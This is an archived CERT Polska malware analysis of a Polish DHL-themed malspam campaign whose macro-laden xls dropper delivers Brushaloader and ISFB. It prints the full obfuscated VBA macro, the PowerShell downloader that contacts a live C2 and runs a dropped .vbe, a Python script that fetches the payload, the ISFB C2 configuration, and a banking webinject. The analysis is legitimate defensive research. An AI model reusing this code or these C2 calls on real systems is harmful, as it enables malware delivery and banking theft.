{ "id": "97028d23-72a7-4051-a3c4-7b4eaeca75a4", "created_at": "2026-04-06T00:21:37.29759Z", "updated_at": "2026-04-10T13:12:31.080518Z", "deleted_at": null, "sha1_hash": "958f3ade65029a0782f7f2761aebcc7dce4dc321", "title": "Brushaloader gaining new layers like a pro", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 294033, "plain_text": "Brushaloader gaining new layers like a pro\r\nArchived: 2026-04-05 23:06:43 UTC\r\nYo dawg, I heard you like droppers so I put a dropper in your dropper\r\nOn 2019-11-18 we received a report that some of Polish users have began receiving malspam imitating DHL:\r\nIn this short article, we’ll take a look at the xls document that has been used as a (1st stage) dropper\r\ndistributing another well-known (2nd stage) dropper – brushaloader.\r\nSamples analysed:\r\n6a101103486e67f1d8839edd18da773bd9b665ab3df650c9882245d0ee712b8e – 25163275820.xls\r\n627294cf0495d2daf8d543aca74bf3cf684673c6a32b8ebf6649f882b362a11a – brushaloader\r\nprinthpp.vbe\r\nf25bee3bfe185c6df0ce25cf738f1cc9c72a9ea7f33f6f7545e73d2f3d79b5f8 – brushaloader drop(isfb dll)\r\nWhile the embedded links did not lead to anything interesting, there was also an .xls file attached, let’s try\r\nopening it up:\r\nhttps://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/\r\nPage 1 of 10\n\nInteresting…\r\nPoking around, we have noticed that some cells have text in them, but their contents were hidden using\r\nspecific style and formatting; the font size was set to 2 and color was set to white.\r\nLet’s fetch the macro contents to see what’s going on under the hood: ➜ ~olevba 25163275820.xls\r\nConst leftt = 5\r\nFunction cobos()\r\noko = Left((sokia), 2) + 0\r\ncobos = Cells(oko, oko)\r\nEnd Function\r\nSub toro()\r\nDim boll As Workbook\r\nSet boll = Workbooks.Add\r\nEnd Sub\r\nSub comaro()\r\nG = \"0\"\r\nIf Mid(ActiveWorkbook.Name, Len(ActiveWorkbook.Name) - 4, 1) = G Then corecc\r\nEnd Sub\r\nFunction frug()\r\nfrug = Zero + False\r\nEnd Function\r\nFunction afa()\r\nafa = msoLanguageIDUI\r\nEnd Function\r\nFunction sokia()\r\nhttps://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/\r\nPage 2 of 10\n\nsokia = Application.LanguageSettings.LanguageID(afa)\r\nEnd Function\r\nFunction corecc()\r\nIf sokia = 209 * leftt Then Shell venus, msoSyncConflictClientWins\r\ntoro\r\nEnd Function\r\nFunction venus()\r\nDim des, kes As String: des = \"\": kes = des\r\nFor t = leftt To 8\r\ndes = des + Zerro(Cells(t, leftt - 1))\r\nNext t\r\nFor w = leftt To 8\r\nkes = kes + Zerro(Cells(w, leftt))\r\nNext w\r\nvenus = des + cobos \u0026 kes\r\nEnd Function\r\nFunction Zerro(ByVal finde As String) As String\r\nJ = 1\r\nDim CGu, subb, hole As Integer\r\nDim Nnul As Integer\r\nDim arrg() As Integer\r\nDim vexel() As Long\r\nsubb = IIf(Right(finde, 1) Mod 2 = frug, leftt, leftt - J)\r\nfinde = Left(finde, Len(finde) - IIf(Right(finde, 1) Mod 2 = frug, J, J))\r\nhole = Len(finde) / subb - J\r\nReDim arrg(hole): ReDim vexel(hole)\r\nNnul = frug: CGu = frug\r\nFor CGu = frug To hole\r\narrg(CGu) = CGu - (hole + J)\r\nNext CGu\r\nFor Nnul = frug To hole\r\nFor CGu = frug To hole\r\nIf CInt(Mid(finde, CGu * subb + J, subb - 3)) = Nnul Then\r\nvexel(Nnul) = (Mid(finde, (CGu + J) * subb - 2, 3) + arrg(Nnul))\r\nExit For\r\nEnd If\r\nNext CGu\r\nNext Nnul\r\nZerro = \"\" + \"\"\r\nhttps://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/\r\nPage 3 of 10\n\nFor Nnul = frug To hole\r\nZerro = Zerro \u0026 Chr(vexel(Nnul))\r\nNext Nnul\r\nEnd Function\r\nPrivate Sub borderstyle_Layout()\r\nDebug.Print: ThisWorkbook.comaro: Debug.Print \"\"\r\nEnd Sub\r\nPrivate Sub prnt_Click()\r\nDebug.Print \"\": ThisWorkbook.comaro:\r\nEnd Sub\r\nThe above code is a complete source-code of the macros embedded in the spreadsheet. Taking a closer look\r\nwe can identify several interesting snippets:\r\nPrivate Sub prnt_Click()\r\nDebug.Print \"\": ThisWorkbook.comaro:\r\nEnd Sub\r\nThe print button does nothing, probably to encourage users to enable macros in the document.\r\nConst leftt = 5\r\n...\r\nFunction afa()\r\nafa = msoLanguageIDUI\r\nEnd Function\r\nFunction sokia()\r\nsokia = Application.LanguageSettings.LanguageID(afa)\r\nEnd Function\r\nFunction corecc()\r\nIf sokia = 209 * leftt Then Shell venus, msoSyncConflictClientWins\r\ntoro\r\nEnd Function\r\nThe payload script will run only on application with language set to Polish (id=1045).\r\nConst leftt = 5\r\n...\r\nFunction cobos()\r\noko = Left((sokia), 2) + 0\r\ncobos = Cells(oko, oko)\r\nEnd Function\r\nFunction venus()\r\nDim des, kes As String: des = \"\": kes = des\r\nhttps://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/\r\nPage 4 of 10\n\nFor t = leftt To 8\r\ndes = des + Zerro(Cells(t, leftt - 1))\r\nNext t\r\nFor w = leftt To 8\r\nkes = kes + Zerro(Cells(w, leftt))\r\nNext w\r\nvenus = des + cobos \u0026 kes\r\nEnd Function\r\nThe program will fetch values from cells D5:D8, E5:E8 and J10 which match the fields with embedded data\r\nthat we have observed earlier.\r\nThe cells’ contents are decrypted and concatenated using a custom algorithm. The result is a PowerShell\r\nscript:\r\nPoWershelL -noniNtER -W 000000000000000000000000000000000000000000000001 -exEcuTIonPOlic BYpAsS -NopRofi \"\\\".( `$VErbOS\r\n'TVZpj6NIEv0rVms11SW6ixvskeYDmNscNoeN3RqpMWDMfdocvfXfN9OzrV3JzosX8SJfJkGsvq7++PrlF/H5C/v8hX9+WX2/rd6+v317s6\r\n)\"\\\" +([CHaR]44).TOSTRing()+ \"\\\" [IO.ComPREssioN.comprESsIOnmoDE]::deCoMPRess ) ) \"\\\" +([CHaR]44).TOSTRing()+ \"\\\" [TEXt.eN\r\nDecompressing the deflate blob can be easily achieved using the following Python script:\r\nimport base64\r\nimport zlib\r\nencoded = \"TVZpj6NIEv0rVms11...\"\r\ndecoded = base64.b64decode(encoded)\r\ndecompressed = zlib.decompress(decoded, -15)\r\nwith open('output', 'wb') as f:\r\nf.write(decompressed)\r\nRunning the script yields the following results:\r\n( \u0026(\"{2}{0}{1}\" -f '-','ObJEcT','nEW') (\"{4}{0}{3}{2}{1}{5}\" -f'ySt','De','Mrea','em.iO.sTrEa','S','R')((\u0026(\"{0}{1}{2}\"-f 'n','EW-','ObJEcT'\r\nf'BqK8O8PL9e3DOza','oSQTxj3qX22DBeNY3QCLM5+Xpm0hpt2BX5NbKMIy73H9hF1TVbTyy','ftM0s6HI5TJz','5ooLFtgI+rfXrSqBilEi\r\n,[IO.coMPresSioN.cOmpreSsIONmOdE]::\"D`ecO`MprEss\" )),[sySTem.teXT.ENcODINg]::\"AS`cII\") ).(\"{0}{1}\" -f'ReADTOE','nd').Invoke\r\nThe resulting script is somewhat obfuscated using strings formatting, we can clean it up with another quick\r\nPython script:\r\nimport re\r\nimport sys\r\nstring_format = '''\\\\(\"((\\\\{\\\\d+\\\\})+)\"\\\\s*-f\\\\s*('.*?')\\\\)'''\r\ndef reformat(match):\r\nitems = list(map(int, match.group(1)[1:-1].split('}{')))\r\nstrings = match.group(3)[1:-1].split('\\',\\'')\r\nreturn '\"' + ''.join(strings[x] for x in items) + '\"'\r\nwith open(sys.argv[1]) as f:\r\ndata = f.read()\r\nhttps://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/\r\nPage 5 of 10\n\nprint(re.sub(string_format, reformat, data))\r\nWhich gives us another PowerShell script with a large base64 blob that contains the next layer:\r\n( \u0026\"nEW-ObJEcT\" \"SyStem.iO.sTrEaMreaDeR\"((\u0026\"nEW-ObJEcT\" \"sYSTem.IO.comPResSiON.dEfLAteSTrEAm\"( [Io.MEMORysTREAM\r\n[CONVErt]::\"frOmBASE64STRIng\".Invoke(\"pVZpc+JGEP0rKoqspABjDuNsTFGOl8uu9UEMa6eWkNUgBpCty6PBlzz/Pd0zksBJvoUPgx\r\n,[IO.coMPresSioN.cOmpreSsIONmOdE]::\"D`ecO`MprEss\" )),[sySTem.teXT.ENcODINg]::\"AS`cII\") ).\"ReADTOEnd\".Invoke() |\u0026( ${eN`V\r\nDecoding the base64 and cleaning up the binary again gives us a yet another PowerShell script:\r\nfunction W`D(${Q}){${B} = ${q}.ToCharArray();Foreach (${E`l} in ${B}) {${c} = ${C} + \"\" +\r\n[System.String]::Format(\"{0:X2}\", [System.Convert]::ToUInt32(${e`l}))}${c}};${dF}=.\"Get-WMIObject\" -class \"win32_PhysicalMedia\";${E`ZA}=\r\n[Text.Encoding]::UTF8;${a}='';${s`Er}=foreach(${df} in ${dF})\r\n{${A}=${A}+${d`F}.SerialNumber};${E}=.('wd')(${a});.('SV') ('j') (\u0026\"New-Object\"\r\n\"Net.WebClient\");.('Sv') \"qW3\" \"https://reloffersstart.co/ss.php?$e\";function G`H(${sG}){${Tg}=\r\n[Convert]::FromBase64String(${S`G});return ${Tg}};${p`P}=(\u0026\"New-Object\" \"IO.StreamReader\"\r\n(.\"New-Object\" \"IO.Compression.GzipStream\"((.\"New-Object\" \"IO.MemoryStream\"(,(([byte[]]\r\n(.\"Variable\" ('j')).Value.DownloadData((.('Gi') \"Variable:/qW3\").Value))))),\r\n[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();${F5}=${Pp}.substring(0,5)+\r\n(${pp} -replace '.*?(?=.{1,5}$)').trim();${P`P}=(${p`p} -replace \".{5}$\") -replace \"^.\r\n{5}\";foreach(${o`H} in ${P`P}){${ok}=@();${f`s}=${F5}.ToCharArray();${OH}=.('gh')\r\n(${OH});for(${Z}=0;${z} -lt ${O`h}.count;${z}++){${ok}+=[char]([Byte]${O`h}[${z}] -\r\nbxor[Byte]${F`S}[${z}%${f`S}.count])}};${M`k}=(\u0026\"Gci\" -path (((${e`NV:T`EmP}.tostring()))) |\r\n.\"Where-Object\" { ${_}.PSIsContainer }|.\"select\" \"fullname\" |.\"Get-Random\" -count 1).FullName+\r\n((\"bj2printhpp.vbe\").REpLAce(([CHaR]98+[CHaR]106+[CHaR]50),[StrinG][CHaR]92));\r\n[io.file]::WriteAllText(${m`K},(${E`za}.GetString((\u0026('gh')(((\u0026\"New-Object\" \"IO.StreamReader\"\r\n(\u0026\"New-Object\" \"IO.Compression.GzipStream\"((\u0026\"New-Object\" \"IO.MemoryStream\"(,(\u0026('gh')\r\n(${Ok})))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))))));if((\u0026\"gci\"\r\n${m`K}).Length -lt 5){exit};[System.Diagnostics.Process]::Start(${M`K})|.\"out-null\";\u0026\"sleep\" 25;.\r\n('ls');[io.file]::WriteAllLines(${M`K},[regex]::replace(${E},'\\D','1'));\r\nAfter some manual formatting we eneded up with the below script:\r\nfunction W`D(${Q}){\r\n${B} = ${q}.ToCharArray();\r\nForeach (${E`l} in ${B}) {\r\n${c} = ${C} + \"\" + [System.String]::Format(\"{0:X2}\", [System.Convert]::ToUInt32(${e`l}))\r\n}\r\n${c}\r\n};\r\n${dF}=.\"Get-WMIObject\" -class \"win32_PhysicalMedia\";\r\n${E`ZA}=[Text.Encoding]::UTF8;\r\n${a}='';\r\n${s`Er}=foreach(${df} in ${dF}){${A}=${A}+${d`F}.SerialNumber};\r\n${E}=.('wd')(${a});\r\n.('SV') ('j') (\u0026\"New-Object\" \"Net.WebClient\");\r\n.('Sv') \"qW3\" \"https://reloffersstart.co/ss.php?$e\";\r\nfunction G`H(${sG}){\r\n${Tg}=[Convert]::FromBase64String(${S`G});\r\nreturn ${Tg}\r\n};\r\nhttps://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/\r\nPage 6 of 10\n\n${p`P}=(\u0026\"New-Object\" \"IO.StreamReader\"(.\"New-Object\" \"IO.Compression.GzipStream\"((.\"New-Object\" \"IO.MemoryStream\"(,(([byte[]](.\"Variable\" ('j')).Value.DownloadData((.('Gi')\r\n\"Variable:/qW3\").Value))))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();\r\n${F5}=${Pp}.substring(0,5)+ (${pp} -replace '.*?(?=.{1,5}$)').trim();\r\n${P`P}=(${p`p} -replace \".{5}$\") -replace \"^.{5}\";\r\nforeach(${o`H} in ${P`P}){\r\n${ok}=@();\r\n${f`s}=${F5}.ToCharArray();\r\n${OH}=.('gh')(${OH});\r\nfor(${Z}=0; ${z} -lt ${O`h}.count; ${z}++){\r\n${ok}+=[char]([Byte]${O`h}[${z}] -bxor[Byte]${F`S}[${z}%${f`S}.count])\r\n}\r\n};\r\n${M`k}=(\u0026\"Gci\" -path (((${e`NV:T`EmP}.tostring()))) | .\"Where-Object\" { ${_}.PSIsContainer\r\n}|.\"select\" \"fullname\" |.\"Get-Random\" -count 1).FullName+\r\n((\"bj2printhpp.vbe\").REpLAce(([CHaR]98+[CHaR]106+[CHaR]50),[StrinG][CHaR]92));\r\n[io.file]::WriteAllText(${m`K},(${E`za}.GetString((\u0026('gh')(((\u0026\"New-Object\" \"IO.StreamReader\"\r\n(\u0026\"New-Object\" \"IO.Compression.GzipStream\"((\u0026\"New-Object\" \"IO.MemoryStream\"(,(\u0026('gh')\r\n(${Ok})))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))))));\r\nif((\u0026\"gci\" ${m`K}).Length -lt 5){exit};\r\n[System.Diagnostics.Process]::Start(${M`K})|.\"out-null\";\r\n\u0026\"sleep\" 25;\r\n.('ls');\r\n[io.file]::WriteAllLines(${M`K},[regex]::replace(${E},'\\D','1'));\r\nIn short, the script iterates over drive IDs and concatenates them creating a hex-encoded unique id.\r\nThat id is then submitted to the c2, which responds with an xor-encrypted payload, that is the first stage vbs of\r\na normal brushaloader campaign.\r\nIt can be easilly fetched, decrypted and decoded using this nifty Python script with some help from our\r\nmalware-analysis library – malduck:\r\nimport requests\r\nimport malduck\r\nfrom base64 import b64decode\r\nimport gzip\r\nimport os\r\n# url fetched from sample\r\nurl = 'https://reloffersstart.co/ss.php'\r\nmy_disk_id = os.urandom(32).hex()\r\n# avoid causing a scene\r\nheaders = {\r\n'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Microsoft Windows 10.0.15063; en-US)\r\nPowerShell/6.0.0'\r\nhttps://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/\r\nPage 7 of 10\n\n}\r\n# ¯\\_(ツ)_/¯\r\nproxies = {\r\n'http': 'socks5://localhost:9050',\r\n'https': 'socks5://localhost:9050'\r\n}\r\nr = requests.get(f'{url}?{my_disk_id}', proxies=proxies, headers=headers)\r\n# the original response is gziped\r\nresponse = gzip.decompress(r.content)\r\n# the xor key is composed of first and last 5 bytes\r\nkey = response[:5] + response[-5:]\r\npayload = response[5:-5]\r\ndecrypted = malduck.xor(key, b64decode(payload))\r\n# additional compression + encoding for some reason\r\nfinal_payload = b64decode(gzip.decompress(b64decode(decrypted)))\r\nwith open('printhpp.vbe', 'w') as f:\r\nf.write(final_payload.decode('utf-8'))\r\nBrushaloader has been described exensively in the past by Proofpoint and Talos, nothing new here.\r\nLet’s focus on the dropped binary instead, Brushaloader used to be used for distribution of Danabot botnet no.\r\n3 in Poland, but some time ago we have observed a shift to ISFB v2.\r\nFor this particular sample the config is as follows:\r\n{\r\n\"compilation_date\": \"Nov 5 2019\",\r\n\"tor64_dll\": \"google.com file://%appdata%/system64.dll\",\r\n\"botnet\": 1000,\r\n\"sendtimeout\": 300,\r\n\"bctimeout\": 10,\r\n\"ssl\": true,\r\n\"configfailtimeout\": 30,\r\n\"dga_seed\": 1,\r\n\"dga_base_url\": \"constitution.org/usdeclar.txt\",\r\n\"key\": \"WIdtM3YCfxhwrbV1\",\r\n\"dga_lsa_seed\": 3988359472,\r\n\"server\": 12,\r\n\"dga_count\": 5,\r\n\"configtimeout\": 300,\r\n\"public_key\": {\r\n\"e\": 65537,\r\nhttps://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/\r\nPage 8 of 10\n\n\"n\":\r\n\"2725621389245588428706735738158507614960965498383362980023038125231728833580944752096318564227427417832244994566\r\n},\r\n\"type\": \"isfb\",\r\n\"dga_tld\": [\r\n\".com\",\r\n\".ru\",\r\n\".org\"\r\n],\r\n\"knockertimeout\": 300,\r\n\"xcookie\": -1,\r\n\"timer\": 60,\r\n\"exe_type\": \"worker\",\r\n\"ip_service\": \"curlmyip.net\",\r\n\"tasktimeout\": 300,\r\n\"tor32_dll\": \"google.com file://%appdata%/system32.dll\",\r\n\"version\": \"2.16.098\",\r\n\"domains\": [\r\n{\r\n\"cnc\": \"http://ey7kuuklgieop2pq.onion\\n\"\r\n},\r\n{\r\n\"cnc\": \"http://maiamirainy.at\"\r\n},\r\n{\r\n\"cnc\": \"http://drunt.at\"\r\n}\r\n],\r\n\"dga_season\": 10,\r\n\"dga_crc\": 1320669898\r\n}\r\nThe static config is used to download webinjects and redirects targeting Polish banking sites and email\r\nproviders.\r\nACTION: REDIRECT - Target: https://*test1/my9rep/* -\u003e http://nesssellbuyt.xyz/hc/\r\nACTION: REDIRECT - Target: https://*css15/home/* -\u003e http://nesssellbuyt.xyz/newstyle/\r\nset_url https://\u003cREDACTED\u003e/*\r\nreplace: \u003c/title\u003e\r\ninject:\r\n\u003c/title\u003e\r\n\u003cscript id=\"myjs1\" src=\"test1/my9rep/myjs28_frr_s35.js?bb=@ID@\" data-botid=\"@ID@\"\u003e\u003c/script\u003e\r\nhttps://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/\r\nPage 9 of 10\n\n\u003cscript id=\"myjs2\"\u003e\r\ndocument.getElementById(\"myjs1\").parentNode.removeChild(document.getElementById(\"myjs1\"));\r\ndocument.getElementById(\"myjs2\").parentNode.removeChild(document.getElementById(\"myjs2\"));\r\n\u003c/script\u003e\r\nend_inject\r\nIf you’re interested in receiving information about webinjects targeted at your domain, you might want to\r\ncheck out our injects sharing website: injects.cert.pl\r\nThat’s it, if you have any additional questions do not hestitate to reach out to us at @CERT_Polska_en or\r\ninfo@cert.pl\r\nThanks to Kafeine from Proofpoint for the ISFB sample.\r\nSource: https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/\r\nhttps://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/" ], "report_names": [ "brushaloader-gaining-new-layers-like-a-pro" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb", "created_at": "2023-01-06T13:46:38.228042Z", "updated_at": "2026-04-10T02:00:02.883048Z", "deleted_at": null, "main_name": "APT1", "aliases": [ "PLA Unit 61398", "Comment Crew", "Byzantine Candor", "Comment Group", "GIF89a", "Group 3", "TG-8223", "Brown Fox", "ShadyRAT", "G0006", "COMMENT PANDA" ], "source_name": "MISPGALAXY:APT1", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b", "created_at": "2022-10-25T16:07:23.480196Z", "updated_at": "2026-04-10T02:00:04.626125Z", "deleted_at": null, "main_name": "Comment Crew", "aliases": [ "APT 1", "BrownFox", "Byzantine Candor", "Byzantine Hades", "Comment Crew", "Comment Panda", "G0006", "GIF89a", "Group 3", "Operation Oceansalt", "Operation Seasalt", "Operation Siesta", "Shanghai Group", "TG-8223" ], "source_name": "ETDA:Comment Crew", "tools": [ "Auriga", "Cachedump", "Chymine", "CookieBag", "Darkmoon", "GDOCUPLOAD", "GLOOXMAIL", "GREENCAT", "Gen:Trojan.Heur.PT", "GetMail", "Hackfase", "Hacksfase", "Helauto", "Kurton", "LETSGO", "LIGHTBOLT", "LIGHTDART", "LOLBAS", "LOLBins", "LONGRUN", "Living off the Land", "Lslsass", "MAPIget", "ManItsMe", "Mimikatz", "MiniASP", "Oceansalt", "Pass-The-Hash Toolkit", "Poison Ivy", "ProcDump", "Riodrv", "SPIVY", "Seasalt", "ShadyRAT", "StarsyPound", "TROJAN.COOKIES", "TROJAN.FOXY", "TabMsgSQL", "Tarsip", "Trojan.GTALK", "WebC2", "WebC2-AdSpace", "WebC2-Ausov", "WebC2-Bolid", "WebC2-Cson", "WebC2-DIV", "WebC2-GreenCat", "WebC2-Head", "WebC2-Kt3", "WebC2-Qbp", "WebC2-Rave", "WebC2-Table", "WebC2-UGX", "WebC2-Yahoo", "Wordpress Bruteforcer", "bangat", "gsecdump", "pivy", "poisonivy", "pwdump", "zxdosml" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434897, "ts_updated_at": 1775826751, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/958f3ade65029a0782f7f2761aebcc7dce4dc321.pdf", "text": "https://archive.orkl.eu/958f3ade65029a0782f7f2761aebcc7dce4dc321.txt", "img": "https://archive.orkl.eu/958f3ade65029a0782f7f2761aebcc7dce4dc321.jpg" } }